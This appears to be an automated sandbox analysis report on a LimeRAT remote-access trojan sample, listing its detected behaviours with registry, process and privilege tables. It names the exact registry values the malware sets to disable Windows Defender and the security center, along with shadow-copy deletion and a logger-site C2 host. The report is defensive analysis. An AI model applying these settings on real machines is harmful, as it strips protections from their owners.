Malware Analysis Report

2024-09-11 09:56

Sample ID 240619-11d92aybmj
Target Client.exe
SHA256 4c93b44d1550229fd328c058fbbfe44999ba01e2766b4d3df17c777ce643925e
Tags
limerat defense_evasion evasion execution impact ransomware rat trojan
Score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score
10/10

SHA256

4c93b44d1550229fd328c058fbbfe44999ba01e2766b4d3df17c777ce643925e

Threat Level: Known bad

The file Client.exe was found to be: Known bad.

Malicious Activity Summary

limerat defense_evasion evasion execution impact ransomware rat trojan

Modifies security service

Contains code to disable Windows Defender

LimeRAT

Modifies Windows Defender Real-time Protection settings

Limerat family

Deletes shadow copies

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Enumerates connected drives

Hide Artifacts: Hidden Files and Directories

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Views/modifies file attributes

Uses Volume Shadow Copy service COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Scheduled Task/Job: Scheduled Task

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Disables Windows logging functionality

Uses Task Scheduler COM API

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-19 22:06

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Limerat family

limerat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-19 22:06

Reported

2024-06-19 22:07

Platform

win10-20240404-en

Max time kernel

38s

Max time network

34s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

LimeRAT

rat limerat

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\1601268389\715946058.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\4183903823\2290032291.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\1601268389\715946058.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\4183903823\2290032291.pri C:\Windows\system32\taskmgr.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Disables Windows logging functionality

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 748 wrote to memory of 504 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 504 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 504 wrote to memory of 2968 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 504 wrote to memory of 2968 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 504 wrote to memory of 1160 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 504 wrote to memory of 1160 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 748 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 508 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 508 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
